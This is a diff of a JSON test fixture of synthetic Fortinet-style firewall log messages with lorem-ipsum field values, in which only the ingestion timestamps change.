http_session_id=eseosqu signature_subclass=oeius signature_id=641 srccountry=eaqueip content_switch_name=laud server_pool_name=uido false_positive_mitigation=uis user_name=msequin monitor_status=autem http_refer=https://internal.example.org/ipi/qua.htm?itat=adipisc#omnisist http_version=orroqui dev_id=sci threat_weight=psamvolu history_threat_weight=itsedqui threat_level=oreve ftp_mode=omn ftp_cmd=onevol cipher_suite=ese msg_id=reprehen", "event": { - "ingested": "2021-06-29T09:33:01.618444100Z" + "ingested": "2021-12-09T13:37:31.907099800Z" }, "tags": [ "preserve_original_event" 
@@ -654,7 +654,7 @@ }, "message": "date=2018-3-11 time=2:28:49 logver=eumfugia devid=nimvenia devname=dol logid=rissusc type=lit subtype=quin level=low vd=eddoei srcip=10.35.73.208 srcport=7081 srcintf=eth6552 dstip=10.216.120.61 dstport=6389 dstintf=eth2068 poluuid=dolor sessionid=emUteni proto=tcp action=deny policyid=illoin trandisp=rinre duration=166.295000 sentbyte=5988 rcvdbyte=3374 devtype=olorem osname=mquae osversion=1.1789 mastersrcmac=rQuis srcmac=01:00:5e:b5:9a:3e crscore=5.250000 craction=enimadmi crlevel=elit eventtype=uia user=tem service=unt hostname=ntex5135.corp profile=mqua reqtype=equa url=https://internal.example.com/isc/umdol.jpg?atn=sectet#boreetd direction=outbound msg=olorin method=oluptat cat=olors catdesc=mSecti device_id=ius log_id=quian pri=low userfrom=urExce adminprof=upt timezone=PST main_type=pteurs trigger_policy=intocc sub_type=abo severity_level=orisnis policy=reseo src=10.239.194.105 src_port=3629 dst=10.234.171.117 dst_port=4488 http_method=tenatus http_url=odic http_host=ono http_agent=umtota http_session_id=consequ signature_subclass=ine signature_id=3409 srccountry=dex content_switch_name=ipis server_pool_name=nsecte false_positive_mitigation=miurere user_name=tat monitor_status=pitlabor http_refer=https://example.com/olupta/ape.jpg?mnisiut=eabil#olu http_version=uaUte dev_id=empor threat_weight=ate history_threat_weight=eca threat_level=inre ftp_mode=aliqu ftp_cmd=orem cipher_suite=dquian msg_id=isaute", "event": { - "ingested": "2021-06-29T09:33:01.618449400Z" + "ingested": "2021-12-09T13:37:31.907103300Z" }, "tags": [ "preserve_original_event" 
@@ -666,7 +666,7 @@ }, "message": "logver=emagnaal dtime=2018-03-25 09:31:24.032538723 +0000 UTC devid=uunturm devname=nonnumq vd=tqu date=2018-3-25 time=9:31:24 logid=ntocca type=emquelau subtype=adolorsi level=medium eventtime=maliquam logtime=ovol srcip=10.34.41.75 srcport=4436 srcintf=enp0s7638 srcintfrole=eseosqu dstip=10.249.16.201 dstport=4293 dstintf=lo5084 dstintfrole=mvele poluuid=qui sessionid=etMa proto=3 action=accept policyid=aspe policytype=uradipi crscore=22.220000 craction=atu crlevel=amremape appcat=illoinve service=uis srccountry=itanimi dstcountry=rinc trandisp=isistena tranip=10.107.168.208 tranport=1864 duration=45.477000 sentbyte=1067 rcvdbyte=2855 sentpkt=ctionofd app=uianonnu", "event": { - "ingested": "2021-06-29T09:33:01.618452800Z" + "ingested": "2021-12-09T13:37:31.907107700Z" }, "tags": [ "preserve_original_event" 
@@ -678,7 +678,7 @@ }, "message": "logver=nisiste date=2018-4-8 time=4:33:58 log_id=sedqu devid=itautfu devname=aaliq logid=tDui type=ernatur subtype=itsed level=low vd=xeacomm srcip=10.112.57.220 srcport=5803 srcintf=enp0s1897 dstip=10.19.151.236 dstport=884 dstintf=enp0s4144 poluuid=estiaeco sessionid=vele proto=HOPOPT action=allow policyid=yCiceroi trandisp=loremeu duration=156.263000 sentbyte=3719 rcvdbyte=7292 devtype=colab osname=itte osversion=1.6905 mastersrcmac=orumS srcmac=01:00:5e:c1:b8:93 crscore=60.950000 craction=uptat crlevel=incidun eventtype=agnaaliq user=aturQuis service=cepteurs hostname=tat1845.internal.invalid profile=rumetMal reqtype=tiumtot url=https://www.example.com/imadm/ugiat.txt?Nequepor=nisiu#ptat direction=inbound msg=eddoe method=seq cat=uae catdesc=tobeata device_id=ctas log_id=vol pri=high userfrom=gna adminprof=itautf timezone=ET main_type=eprehe trigger_policy=ariatu sub_type=aqueip severity_level=aqueip policy=rautod src=10.96.168.24 src_port=6206 dst=10.109.106.194 dst_port=5356 http_method=Sedut http_url=stiaec http_host=rveli http_agent=serr http_session_id=umdolo signature_subclass=iduntut signature_id=4281 srccountry=rorsitv content_switch_name=caboNemo server_pool_name=cididun false_positive_mitigation=iamqu user_name=ommodoc monitor_status=mwrit http_refer=https://www5.example.com/madminim/onse.txt?reeuf=orinrepr#tinvo http_version=oru dev_id=ainc threat_weight=aeab history_threat_weight=iat threat_level=acom ftp_mode=olo ftp_cmd=eipsaq cipher_suite=enatu msg_id=mfu", "event": { - "ingested": "2021-06-29T09:33:01.618458100Z" + "ingested": "2021-12-09T13:37:31.907113500Z" }, "tags": [ "preserve_original_event" 
@@ -690,7 +690,7 @@ }, "message": "logver=aliqui date=2018-4-22 time=11:36:32 log_id=uipexea devid=sauteiru devname=nibusB logid=eetdolo type=issuscip subtype=iduntu level=high vd=rinc srcip=10.109.224.208 srcport=1769 srcintf=enp0s3638 dstip=10.31.34.96 dstport=4651 dstintf=enp0s390 poluuid=atis sessionid=edol proto=icmp action=deny policyid=adip trandisp=ugiatq duration=128.795000 sentbyte=4249 rcvdbyte=6693 devtype=atemUte osname=emag osversion=1.1353 mastersrcmac=ecatcup srcmac=01:00:5e:63:85:d2 crscore=62.286000 craction=oin crlevel=isautem eventtype=eiusm user=assit service=ulpaq hostname=ulamc767.internal.lan profile=iades reqtype=mremape url=https://mail.example.net/ionemu/nul.jpg?volupt=ori#sed direction=inbound msg=maveniam method=ctobeat cat=emoenim catdesc=oqui device_id=olab log_id=remagnam pri=high userfrom=mSecti adminprof=volupt timezone=OMST main_type=ela trigger_policy=fugits sub_type=litseddo severity_level=idestl policy=ptasn src=10.112.155.228 src_port=5011 dst=10.47.191.95 dst_port=6242 http_method=velillu http_url=radipi http_host=iatn http_agent=aturE http_session_id=beat signature_subclass=pern signature_id=7568 srccountry=itvolupt content_switch_name=uradip server_pool_name=perspi false_positive_mitigation=uaer user_name=aed monitor_status=tectobe http_refer=https://example.org/scingeli/uatDuis.gif?apari=itesseci#utali http_version=ofdeFin dev_id=siutaliq threat_weight=urvel history_threat_weight=turE threat_level=ntium ftp_mode=imadmi ftp_cmd=dquiac cipher_suite=liquide msg_id=uatD", "event": { - "ingested": "2021-06-29T09:33:01.618463100Z" + "ingested": "2021-12-09T13:37:31.907119200Z" }, "tags": [ "preserve_original_event" 
@@ -702,7 +702,7 @@ }, "message": "logver=gnidolor dtime=2018-05-07 06:39:06.812538723 +0000 UTC devid=BCSedut devname=metco vd=vel date=2018-5-7 time=6:39:06 logid=tmol type=acommodi subtype=ccaecat level=low eventtime=mqu logtime=mips srcip=10.103.169.94 srcport=2174 srcintf=lo5821 srcintfrole=osqu dstip=10.140.137.17 dstport=446 dstintf=enp0s4444 dstintfrole=iono poluuid=atcupi sessionid=dexe proto=0 action=allow policyid=exerci policytype=ems crscore=15.728000 craction=nulapa crlevel=tess appcat=eroi service=enby srccountry=riatur dstcountry=amrema trandisp=illum tranip=10.62.241.218 tranport=7444 duration=5.969000 sentbyte=4832 rcvdbyte=6033 sentpkt=urere app=involu", "event": { - "ingested": "2021-06-29T09:33:01.618469500Z" + "ingested": "2021-12-09T13:37:31.907124900Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "logver=tem devname=\"litsedq\" devid=\"amre\" vd=orpori date=2018-5-21 time=1:41:41 logid=sistena type=iam subtype=saquae level=low eventtime=itanimid logtime=ianonnum srcip=10.90.229.92 srcport=6796 srcintf=lo1752 srcintfrole=inculp dstip=10.251.212.166 dstport=3925 dstintf=eth1592 dstintfrole=aboNemo poluuid=tsedquia sessionid=ididun proto=21 action=cancel policyid=enim policytype=gnido crscore=85.453000 craction=erepr crlevel=tsedqu appcat=uisa service=uptat srccountry=siutal dstcountry=umetMalo trandisp=onevolu tranip=10.77.105.160 tranport=5541 duration=155.903000 sentbyte=5294 rcvdbyte=2687 sentpkt=ira app=umfu", "event": { - "ingested": "2021-06-29T09:33:01.618477Z" + "ingested": "2021-12-09T13:37:31.907130500Z" }, "tags": [ "preserve_original_event" 
@@ -726,7 +726,7 @@ }, "message": "date=2018-6-4 time=8:44:15 logver=uamq devid=mnisist devname=dutp logid=ecillu type=ipsaqu subtype=asun level=very-high vd=llumd srcip=10.100.223.157 srcport=1307 srcintf=eth5742 dstip=10.232.243.87 dstport=4546 dstintf=lo299 poluuid=atisetq sessionid=mSectio proto=0 action=cancel policyid=nonnumqu trandisp=atis duration=63.050000 sentbyte=3508 rcvdbyte=205 devtype=uam osname=tisunde osversion=1.4261 mastersrcmac=rured srcmac=01:00:5e:8a:c1:2a crscore=19.243000 craction=meumfug crlevel=iam eventtype=animi user=porainc service=nsectetu hostname=spici5547.internal.test profile=tate reqtype=sintocca url=https://mail.example.org/asuntex/uovolup.html?amali=uiav#henderi direction=internal msg=tnul method=ons cat=radip catdesc=amremap device_id=dolorsit log_id=atisund pri=very-high userfrom=uredo adminprof=uamni timezone=CT main_type=quisqua trigger_policy=sedquian sub_type=lamcorpo severity_level=rem policy=apariat src=10.216.49.112 src_port=4521 dst=10.112.242.68 dst_port=3105 http_method=aut http_url=eriti http_host=ipsum http_agent=com http_session_id=uptate signature_subclass=tevelite signature_id=5880 srccountry=nimadmi content_switch_name=mquiado server_pool_name=agn false_positive_mitigation=dip user_name=urmag monitor_status=nim http_refer=https://www5.example.net/tutlabo/incid.gif?ptate=tconsect#usm http_version=uunturma dev_id=namaliqu threat_weight=tatemacc history_threat_weight=licab threat_level=roidents ftp_mode=volupta ftp_cmd=stiaeco cipher_suite=tanim msg_id=osam", "event": { - "ingested": "2021-06-29T09:33:01.618501800Z" + "ingested": "2021-12-09T13:37:31.907136200Z" }, "tags": [ "preserve_original_event" 
@@ -738,7 +738,7 @@ }, "message": "date=2018-6-19 time=3:46:49 logver=tla devid=nimve devname=edutpe logid=tenb type=billoinv subtype=asia level=medium vd=paquioff srcip=10.252.175.174 srcport=1995 srcintf=enp0s1531 dstip=10.196.226.219 dstport=545 dstintf=lo2390 poluuid=uaera sessionid=nsequa proto=tcp action=accept policyid=orporis trandisp=oluptate duration=28.731000 sentbyte=2397 rcvdbyte=1768 devtype=itvolu osname=citation osversion=1.491 mastersrcmac=aincid srcmac=01:00:5e:7e:ea:3f crscore=149.960000 craction=tNeque crlevel=uidolore eventtype=uatDuisa user=usB service=magnaali hostname=istenatu3686.invalid profile=remagna reqtype=eritqu url=https://example.org/mnisiut/porinci.htm?norum=emUten#dminimve direction=internal msg=oremagna method=nulamc cat=tempori catdesc=rsintocc device_id=nderit log_id=etco pri=very-high userfrom=lore adminprof=ameiusmo timezone=PT main_type=veniamqu trigger_policy=equat sub_type=reeu severity_level=atemacc policy=rsitvolu src=10.182.58.108 src_port=4811 dst=10.96.100.84 dst_port=2253 http_method=utlabore http_url=texplica http_host=boru http_agent=ntut http_session_id=elaud signature_subclass=acomm signature_id=5667 srccountry=emUten content_switch_name=uamni server_pool_name=laboris false_positive_mitigation=pers user_name=lpaquiof monitor_status=isisten http_refer=https://api.example.net/seddoei/rnatur.jpg?olores=idolorem#umdolors http_version=uid dev_id=numqua threat_weight=citatio history_threat_weight=sed threat_level=mUten ftp_mode=eursint ftp_cmd=velillum cipher_suite=oin msg_id=teurs", "event": { - "ingested": "2021-06-29T09:33:01.618505400Z" + "ingested": "2021-12-09T13:37:31.907141800Z" }, "tags": [ "preserve_original_event" 
@@ -750,7 +750,7 @@ }, "message": "logver=untutl devname=\"cons\" devid=\"vel\" vd=illumdo date=2018-7-3 time=10:49:23 logid=rios type=deF subtype=dutpe level=very-high eventtime=itan logtime=uisnos srcip=10.228.61.5 srcport=1179 srcintf=eth4741 srcintfrole=lites dstip=10.246.41.77 dstport=1217 dstintf=lo7502 dstintfrole=olu poluuid=ectet sessionid=tquovo proto=17 action=block policyid=lapa policytype=xeacom crscore=22.822000 craction=qui crlevel=henderi appcat=rainc service=dminim srccountry=sse dstcountry=tatem trandisp=umexe tranip=10.157.22.21 tranport=5252 duration=135.630000 sentbyte=2167 rcvdbyte=2952 sentpkt=quamei app=nvento", "event": { - "ingested": "2021-06-29T09:33:01.618509200Z" + "ingested": "2021-12-09T13:37:31.907147500Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "logver=qua devname=\"llumdo\" devid=\"tot\" vd=itquii date=2018-7-17 time=5:51:58 logid=psu type=iat subtype=ept level=high eventtime=ectob logtime=aUtenim srcip=10.242.119.111 srcport=645 srcintf=lo1640 srcintfrole=tDuisa dstip=10.239.231.168 dstport=88 dstintf=lo3385 dstintfrole=nimi poluuid=niamqu sessionid=uioffi proto=1 action=allow policyid=consequa policytype=tionu crscore=60.452000 craction=quines crlevel=entsu appcat=ineavol service=abor srccountry=giatq dstcountry=nonpro trandisp=elitsedd tranip=10.188.131.18 tranport=981 duration=46.954000 sentbyte=2770 rcvdbyte=4226 sentpkt=tam app=uovo", "event": { - "ingested": "2021-06-29T09:33:01.618512500Z" + "ingested": "2021-12-09T13:37:31.907153300Z" }, "tags": [ "preserve_original_event" 
@@ -774,7 +774,7 @@ }, "message": "logver=orinrepr date=2018-8-1 time=12:54:32 log_id=untut devid=siu devname=lorem logid=icons type=hende subtype=umdol level=medium vd=psaq srcip=10.24.154.250 srcport=2108 srcintf=eth2707 dstip=10.124.187.230 dstport=6119 dstintf=lo105 poluuid=mqu sessionid=tse proto=udp action=accept policyid=ueip trandisp=amvo duration=20.956000 sentbyte=2068 rcvdbyte=306 devtype=reetdolo osname=tten osversion=1.979 mastersrcmac=usa srcmac=01:00:5e:6a:a6:c9 crscore=45.307000 craction=oremagna crlevel=siuta eventtype=amnihil user=nderit service=ficia hostname=tru3812.mail.lan profile=olo reqtype=xer url=https://api.example.net/nsec/smo.gif?etq=trumexe#rai direction=outbound msg=tNequepo method=byCicer cat=imvenia catdesc=ipit device_id=tdolorem log_id=nderitin pri=low userfrom=enderitq adminprof=amvolu timezone=GMT-07:00 main_type=temvele trigger_policy=ofd sub_type=quam severity_level=umdol policy=porincid src=10.106.101.87 src_port=7569 dst=10.247.124.74 dst_port=2491 http_method=inea http_url=ipsu http_host=iden http_agent=oreseo http_session_id=edictasu signature_subclass=aerat signature_id=4358 srccountry=lites content_switch_name=col server_pool_name=litsedd false_positive_mitigation=mnis user_name=ainci monitor_status=aturve http_refer=https://api.example.com/mporain/secte.txt?amqui=rume#uptate http_version=tisundeo dev_id=uid threat_weight=eFini history_threat_weight=mnis threat_level=tametco ftp_mode=snisiut ftp_cmd=lit cipher_suite=laborio msg_id=aaliqu", "event": { - "ingested": "2021-06-29T09:33:01.618517900Z" + "ingested": "2021-12-09T13:37:31.907159Z" }, "tags": [ "preserve_original_event" 
@@ -786,7 +786,7 @@ }, "message": "date=2018-8-15 time=7:57:06 devname=mid device_id=henderi log_id=consec type=event subtype=dquia pri=high desc=isiutali user=rehe userfrom=volupta msg=etcons action=deny adom=etdol408.internal.home session_id=agnamali", "event": { - "ingested": "2021-06-29T09:33:01.618523200Z" + "ingested": "2021-12-09T13:37:31.907181100Z" }, "tags": [ "preserve_original_event" 
@@ -798,7 +798,7 @@ }, "message": "date=2018-8-29 time=2:59:40 logver=cae devid=Utenimad devname=onsequ logid=Bon type=amquisno subtype=mullam level=very-high vd=admi srcip=10.111.106.60 srcport=5449 srcintf=lo5820 dstip=10.142.181.192 dstport=4386 dstintf=lo6200 poluuid=lmolest sessionid=miurerep proto=17 action=allow policyid=Sed trandisp=isau duration=66.574000 sentbyte=75 rcvdbyte=806 devtype=idest osname=ostru osversion=1.4342 mastersrcmac=enimip srcmac=01:00:5e:11:d6:5d crscore=66.141000 craction=umquiado crlevel=taspe eventtype=empori user=mipsum service=tium hostname=riaturE1644.www5.example profile=ender reqtype=uine url=https://internal.example.com/dolo/exeacom.txt?tlab=eufugiat#upta direction=internal msg=reetdo method=mad cat=mdolor catdesc=amcorpor device_id=oremquel log_id=san pri=high userfrom=amqui adminprof=itatise timezone=GMT-07:00 main_type=cia trigger_policy=lup sub_type=cipitla severity_level=niam policy=mullamc src=10.215.144.167 src_port=6675 dst=10.162.114.52 dst_port=2925 http_method=quepor http_url=Lor http_host=ten http_agent=exeacomm http_session_id=cusan signature_subclass=oquisq signature_id=4993 srccountry=ihilmol content_switch_name=seosqui server_pool_name=tiset false_positive_mitigation=ciade user_name=erspici monitor_status=xercitat http_refer=https://internal.example.net/utlab/entoreve.html?umdol=nseq#autodita http_version=loreme dev_id=eratv threat_weight=tametcon history_threat_weight=orsi threat_level=ull ftp_mode=mcor ftp_cmd=iamquis cipher_suite=aeabi msg_id=ore", "event": { - "ingested": "2021-06-29T09:33:01.618529600Z" + "ingested": "2021-12-09T13:37:31.907186800Z" }, "tags": [ "preserve_original_event" 
@@ -810,7 +810,7 @@ }, "message": "date=2018-9-12 time=10:02:15 logver=catcup devid=ectetur devname=cons logid=spiciati type=upidata subtype=utlabo level=high vd=ersp srcip=10.101.207.156 srcport=2086 srcintf=enp0s4931 dstip=10.12.8.82 dstport=4369 dstintf=enp0s7520 poluuid=nemull sessionid=trumex proto=6 action=accept policyid=doloremq trandisp=iade duration=26.420000 sentbyte=5013 rcvdbyte=7641 devtype=uidolo osname=ita osversion=1.6452 mastersrcmac=rchite srcmac=01:00:5e:41:90:bf crscore=107.693000 craction=tionem crlevel=volupta eventtype=adol user=econsequ service=orever hostname=mdolo7008.api.corp profile=reetdolo reqtype=psam url=https://www5.example.org/orumet/aliqu.txt?tion=sun#utod direction=outbound msg=rinci method=uamestqu cat=riatu catdesc=ulaparia device_id=remagna log_id=fugi pri=very-high userfrom=xerc adminprof=caecat timezone=OMST main_type=cor trigger_policy=nonnumqu sub_type=uidexea severity_level=emu policy=asia src=10.162.128.87 src_port=6214 dst=10.78.75.82 dst_port=7799 http_method=uptat http_url=con http_host=tem http_agent=orpori http_session_id=lor signature_subclass=quiinea signature_id=7098 srccountry=rroquis content_switch_name=dolorema server_pool_name=prehe false_positive_mitigation=bori user_name=Sedutp monitor_status=ritinvo http_refer=https://internal.example.net/ica/nat.jpg?ddoe=nsequ#lloinve http_version=tdolo dev_id=billoi threat_weight=sequu history_threat_weight=ffic threat_level=imadmini ftp_mode=isnostru ftp_cmd=ostr cipher_suite=tinvo msg_id=lorumwr", "event": { - "ingested": "2021-06-29T09:33:01.618536800Z" + "ingested": "2021-12-09T13:37:31.907192400Z" }, "tags": [ "preserve_original_event" 
@@ -822,7 +822,7 @@ }, "message": "logver=ctetura devname=\"reseosqu\" devid=\"ittenbyC\" vd=tlabor date=2018-9-27 time=5:04:49 logid=auteir type=uredolo subtype=uido level=medium eventtime=quiratio logtime=aincidu srcip=10.75.198.93 srcport=1982 srcintf=eth725 srcintfrole=umqu dstip=10.137.36.151 dstport=196 dstintf=lo1813 dstintfrole=rspici poluuid=duntutla sessionid=emeu proto=1 action=block policyid=atemUten policytype=turadipi crscore=16.226000 craction=estqu crlevel=orinre appcat=prehen service=equa srccountry=ciatisun dstcountry=mdolorem trandisp=nnumq tranip=10.51.106.43 tranport=6486 duration=78.551000 sentbyte=3531 rcvdbyte=5464 sentpkt=oremeumf app=volupt", "event": { - "ingested": "2021-06-29T09:33:01.618544100Z" + "ingested": "2021-12-09T13:37:31.907198200Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "logver=tnulapa devname=\"caecatcu\" devid=\"xcepte\" vd=deserun date=2018-10-11 time=12:07:23 logid=mvol type=erep subtype=teurs level=low eventtime=tiumdol logtime=byCicer srcip=10.154.151.111 srcport=5860 srcintf=eth1273 srcintfrole=uisnos dstip=10.7.230.206 dstport=5757 dstintf=lo1291 dstintfrole=pisc poluuid=eumfu sessionid=tseddoe proto=HOPOPT action=allow policyid=emulla policytype=bill crscore=147.522000 craction=oditaut crlevel=oloremqu appcat=untNeque service=reetdol srccountry=perspi dstcountry=tlab trandisp=udexerci tranip=10.249.93.150 tranport=799 duration=113.020000 sentbyte=2808 rcvdbyte=5744 sentpkt=ovolup app=squ", "event": { - "ingested": "2021-06-29T09:33:01.618551200Z" + "ingested": "2021-12-09T13:37:31.907206800Z" }, "tags": [ "preserve_original_event" 
@@ -846,7 +846,7 @@ }, "message": "date=2018-10-25 time=7:09:57 logver=dolor devid=lit devname=ptatem logid=oeiusmod type=ugi subtype=utaliq level=very-high vd=toc srcip=10.76.177.154 srcport=1428 srcintf=eth4425 dstip=10.207.160.170 dstport=7037 dstintf=lo1570 poluuid=reseo sessionid=iration proto=tcp action=deny policyid=magn trandisp=iaecon duration=54.100000 sentbyte=622 rcvdbyte=6280 devtype=ill osname=oris osversion=1.5718 mastersrcmac=ulamcol srcmac=01:00:5e:19:ce:4b crscore=142.771000 craction=oNe crlevel=utfu eventtype=santiumd user=cididunt service=ctasu hostname=itse5466.api.example profile=ica reqtype=mnisis url=https://internal.example.com/nonnumqu/isciveli.gif?wri=aute#iscin direction=outbound msg=uat method=itasper cat=nibusBo catdesc=volupta device_id=olorinr log_id=iameaq pri=high userfrom=docons adminprof=uun timezone=OMST main_type=mremap trigger_policy=ate sub_type=agnaal severity_level=ibusB policy=mexe src=10.217.209.221 src_port=3639 dst=10.26.4.3 dst_port=5291 http_method=rsitame http_url=eca http_host=quirat http_agent=urmagn http_session_id=essec signature_subclass=prehende signature_id=1261 srccountry=setquas content_switch_name=nti server_pool_name=osamnis false_positive_mitigation=atisetqu user_name=ciduntut monitor_status=atisu http_refer=https://internal.example.com/architec/incul.txt?aborios=mco#amnisiu http_version=suntincu dev_id=lore threat_weight=equatu history_threat_weight=enbyCi threat_level=dolo ftp_mode=adipi ftp_cmd=beata cipher_suite=evelites msg_id=ipiscive", "event": { - "ingested": "2021-06-29T09:33:01.618558500Z" + "ingested": "2021-12-09T13:37:31.907212300Z" }, "tags": [ "preserve_original_event" 
@@ -858,7 +858,7 @@ }, "message": "logver=umtot date=2018-11-9 time=2:12:32 log_id=eumiurer devid=inv devname=eac logid=rainc type=tinculp subtype=uianon level=high vd=corpori srcip=10.232.131.132 srcport=581 srcintf=enp0s6255 dstip=10.232.246.98 dstport=1854 dstintf=enp0s1526 poluuid=ivelit sessionid=itlabori proto=icmp action=accept policyid=oide trandisp=magni duration=72.993000 sentbyte=5817 rcvdbyte=6960 devtype=rrorsit osname=emipsu osversion=1.6603 mastersrcmac=temUte srcmac=01:00:5e:fe:be:28 crscore=134.746000 craction=hitec crlevel=sci eventtype=luptatev user=ruredo service=iamquis hostname=dquiac6194.api.lan profile=nidolo reqtype=runtmoll url=https://www5.example.org/utlabo/scip.html?voluptas=inv#upta direction=external msg=ors method=olupta cat=raincidu catdesc=nisi device_id=uipexea log_id=taedic pri=high userfrom=ugi adminprof=urExcep timezone=CET main_type=usant trigger_policy=uidolore sub_type=litse severity_level=ugitse policy=utfugi src=10.241.140.241 src_port=1813 dst=10.180.162.174 dst_port=7186 http_method=ido http_url=atnu http_host=ssuscipi http_agent=evita http_session_id=tconsect signature_subclass=lpaquiof signature_id=532 srccountry=lors content_switch_name=Finibus server_pool_name=totam false_positive_mitigation=idat user_name=nulapar monitor_status=git http_refer=https://www5.example.com/odtem/tati.jpg?ueips=umqu#ntexpli http_version=siuta dev_id=porincid threat_weight=itame history_threat_weight=inv threat_level=remaper ftp_mode=quaUteni ftp_cmd=evelit cipher_suite=oluptat msg_id=ditem", "event": { - "ingested": "2021-06-29T09:33:01.618565700Z" + "ingested": "2021-12-09T13:37:31.907216900Z" }, "tags": [ "preserve_original_event" 
@@ -870,7 +870,7 @@ }, "message": "date=2018-11-23 time=9:15:06 devname=oditautf device_id=asiarc log_id=eddoei type=generic subtype=iatqu pri=very-high devid=itessec devname=dat logid=tdol type=emul subtype=ariatu level=high vd=reseo srcip=10.53.70.207 srcport=1793 srcintf=lo2279 dstip=10.73.140.61 dstport=2114 dstintf=lo368 poluuid=stlabo sessionid=atema proto=1 action=deny policyid=orporiss trandisp=iamq duration=128.426000 sentbyte=1800 rcvdbyte=5783 devtype=pis osname=riosam osversion=1.2052 mastersrcmac=iosam srcmac=01:00:5e:21:d3:0a crscore=65.426000 craction=archi crlevel=nes eventtype=atvolupt user=umwritt service=uae hostname=amco1592.mail.host profile=aaliq reqtype=olupta url=https://internal.example.com/ssusci/snostrud.txt?dolo=siutaliq#obeata direction=outbound msg=tame method=olo cat=vel catdesc=equamn device_id=tempora log_id=enimip pri=very-high userfrom=saqua adminprof=aperia timezone=OMST main_type=tNeque trigger_policy=metcon sub_type=enimadmi severity_level=orem policy=corpor src=10.110.99.222 src_port=5685 dst=10.62.140.108 dst_port=1225 http_method=ssitasp http_url=ptat http_host=asp http_agent=uatDui http_session_id=nofdeFin signature_subclass=unde signature_id=3979 srccountry=seruntm content_switch_name=aera server_pool_name=scive false_positive_mitigation=ngelit user_name=moenimi monitor_status=mqu http_refer=https://mail.example.org/ueipsaq/upid.gif?utla=emUte#tisund http_version=tutla dev_id=isund threat_weight=atemU history_threat_weight=uidex threat_level=uptate ftp_mode=eac ftp_cmd=peria cipher_suite=amaliq msg_id=ium", "event": { - "ingested": "2021-06-29T09:33:01.618572900Z" + "ingested": "2021-12-09T13:37:31.907221300Z" }, "tags": [ "preserve_original_event" 
@@ -882,7 +882,7 @@ }, "message": "logver=ptate date=2018-12-7 time=4:17:40 log_id=tenatu devid=emo devname=ratio logid=maperia type=Maloru subtype=sumquia level=low vd=imadmini srcip=10.237.5.219 srcport=3828 srcintf=eth4604 dstip=10.197.99.150 dstport=3877 dstintf=enp0s7388 poluuid=odo sessionid=itseddoe proto=prm action=accept policyid=itinvo trandisp=uiavol duration=96.864000 sentbyte=2685 rcvdbyte=7612 devtype=urmagn osname=ficiade osversion=1.2691 mastersrcmac=equ srcmac=01:00:5e:f5:2a:24 crscore=163.671000 craction=mipsum crlevel=dolor eventtype=cupidata user=niamquis service=lapariat hostname=dicta7226.mail.example profile=eddoei reqtype=cingel url=https://api.example.com/temporai/umw.jpg?mveniamq=litsed#ptasn direction=unknown msg=loinv method=umd cat=madmi catdesc=xercit device_id=avolup log_id=etdo pri=medium userfrom=veleum adminprof=emUten timezone=CT main_type=proiden trigger_policy=cita sub_type=iac severity_level=ntincul policy=mnisiste src=10.4.244.115 src_port=4588 dst=10.53.50.77 dst_port=5330 http_method=lorem http_url=lore http_host=orroqu http_agent=tlabo http_session_id=iameaque signature_subclass=sautemve signature_id=6466 srccountry=emoe content_switch_name=ameiusmo server_pool_name=ntiumtot false_positive_mitigation=aeab user_name=idolo monitor_status=temac http_refer=https://api.example.net/ollita/idolore.html?illu=iut#asiarc http_version=imidest dev_id=mwri threat_weight=orsi history_threat_weight=ritinvol threat_level=rporiss ftp_mode=atu ftp_cmd=ddo cipher_suite=veli msg_id=ata", "event": { - "ingested": "2021-06-29T09:33:01.618580100Z" + "ingested": "2021-12-09T13:37:31.907225300Z" }, "tags": [ "preserve_original_event" 
@@ -894,7 +894,7 @@ }, "message": "logver=lor dtime=2018-12-21 23:20:14.972538723 +0000 UTC devid=ori devname=eleumiu vd=amre date=2018-12-21 time=11:20:14 logid=atur type=untex subtype=Except level=very-high eventtime=econse logtime=iac srcip=10.221.100.157 srcport=865 srcintf=lo4518 srcintfrole=mqu dstip=10.236.211.111 dstport=1801 dstintf=enp0s454 dstintfrole=rauto poluuid=pteursi sessionid=iquamqua proto=tcp action=allow policyid=psumqui policytype=equeporr crscore=32.741000 craction=cusanti crlevel=doloreme appcat=nsecte service=reprehen srccountry=taspe dstcountry=litess trandisp=enimadm tranip=10.120.212.78 tranport=119 duration=17.257000 sentbyte=4752 rcvdbyte=3484 sentpkt=ntsuntin app=ectetur", "event": { - "ingested": "2021-06-29T09:33:01.618587400Z" + "ingested": "2021-12-09T13:37:31.907229200Z" }, "tags": [ "preserve_original_event" 
@@ -906,7 +906,7 @@ }, "message": "date=2019-1-5 time=6:22:49 logver=intocca devid=vel devname=xeacom logid=orum type=voluptat subtype=nsequ level=medium vd=tenimad srcip=10.140.215.210 srcport=7229 srcintf=lo568 dstip=10.71.213.217 dstport=7475 dstintf=eth5820 poluuid=lup sessionid=reetdolo proto=HOPOPT action=accept policyid=dolor trandisp=emagnam duration=154.150000 sentbyte=2336 rcvdbyte=5326 devtype=emull osname=enatuser osversion=1.3052 mastersrcmac=ectob srcmac=01:00:5e:4a:5d:af crscore=9.013000 craction=niamqu crlevel=nrep eventtype=lauda user=ionevo service=busB hostname=pidatatn2627.www.localdomain profile=eritinvo reqtype=quiav url=https://mail.example.org/ngelit/dipiscin.gif?serro=ctet#umiurere direction=inbound msg=ciun method=ssitaspe cat=deomnis catdesc=ulamcol device_id=onn log_id=redol pri=medium userfrom=utlabore adminprof=nci timezone=OMST main_type=liqu trigger_policy=ectetura sub_type=aUte severity_level=untNeque policy=roi src=10.210.82.202 src_port=2749 dst=10.208.231.15 dst_port=412 http_method=rios http_url=diconseq http_host=tenima http_agent=iusm http_session_id=mveleumi signature_subclass=equinesc signature_id=5076 srccountry=mfugiatq content_switch_name=dmini server_pool_name=emveleu false_positive_mitigation=loree user_name=riatur monitor_status=tempor http_refer=https://internal.example.com/spiciati/tise.gif?ctas=rvelillu#qua http_version=ciat dev_id=iamq threat_weight=porin history_threat_weight=yCi threat_level=arc ftp_mode=santium ftp_cmd=numquame cipher_suite=umfugi msg_id=amestqui", "event": { - "ingested": "2021-06-29T09:33:01.618594600Z" + "ingested": "2021-12-09T13:37:31.907232800Z" }, "tags": [ "preserve_original_event" 
